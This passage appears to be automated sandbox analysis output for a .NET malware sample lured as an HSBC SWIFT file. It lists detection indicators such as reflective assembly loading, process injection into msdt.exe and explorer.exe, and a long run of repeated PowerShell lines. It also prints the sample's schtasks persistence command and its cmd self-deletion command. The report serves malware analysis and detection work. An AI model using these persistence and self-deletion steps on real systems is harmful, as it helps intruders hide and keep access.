          Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\explorer.exe
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HSBC_SWIFT-20-11-2021.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC_SWIFT-20-11-2021.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC_SWIFT-20-11-2021.exe, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: HSBC_SWIFT-20-11-2021.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: RdffGefdbLSx.exe.0.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC_SWIFT-20-11-2021.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC_SWIFT-20-11-2021.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.ea0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.ea0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 0_2_00C09347 push ds; ret 0_2_00C0934C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 0_2_00C09361 push ds; retf 0_2_00C09364
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 0_2_00C092F5 push ds; ret 0_2_00C09340
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 0_2_057856E0 push esp; iretd 0_2_057856E9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_0041B87C push eax; ret 8_2_0041B882
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_0041B812 push eax; ret 8_2_0041B818
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_0041B81B push eax; ret 8_2_0041B882
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_0041B234 push 00000055h; iretd 8_2_0041B236
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_004154CA pushfd ; retf 8_2_004154D3
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_0041B7C5 push eax; ret 8_2_0041B818
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_00EA92F5 push ds; ret 8_2_00EA9340
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_00EA9361 push ds; retf 8_2_00EA9364
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_00EA9347 push ds; ret 8_2_00EA934C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_018ED0D1 push ecx; ret 8_2_018ED0E4
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_0546D0D1 push ecx; ret 20_2_0546D0E4
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E4B87C push eax; ret 20_2_00E4B882
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E4B812 push eax; ret 20_2_00E4B818
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E4B81B push eax; ret 20_2_00E4B882
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E4B234 push 00000055h; iretd 20_2_00E4B236
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E454CA pushfd ; retf 20_2_00E454D3
          Source: C:\Windows\SysWOW64\msdt.exe Code function: 20_2_00E4B7C5 push eax; ret 20_2_00E4B818
          Source: initial sample Static PE information: section name: .text entropy: 7.85580215694
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe File created: C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exe Process created: /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
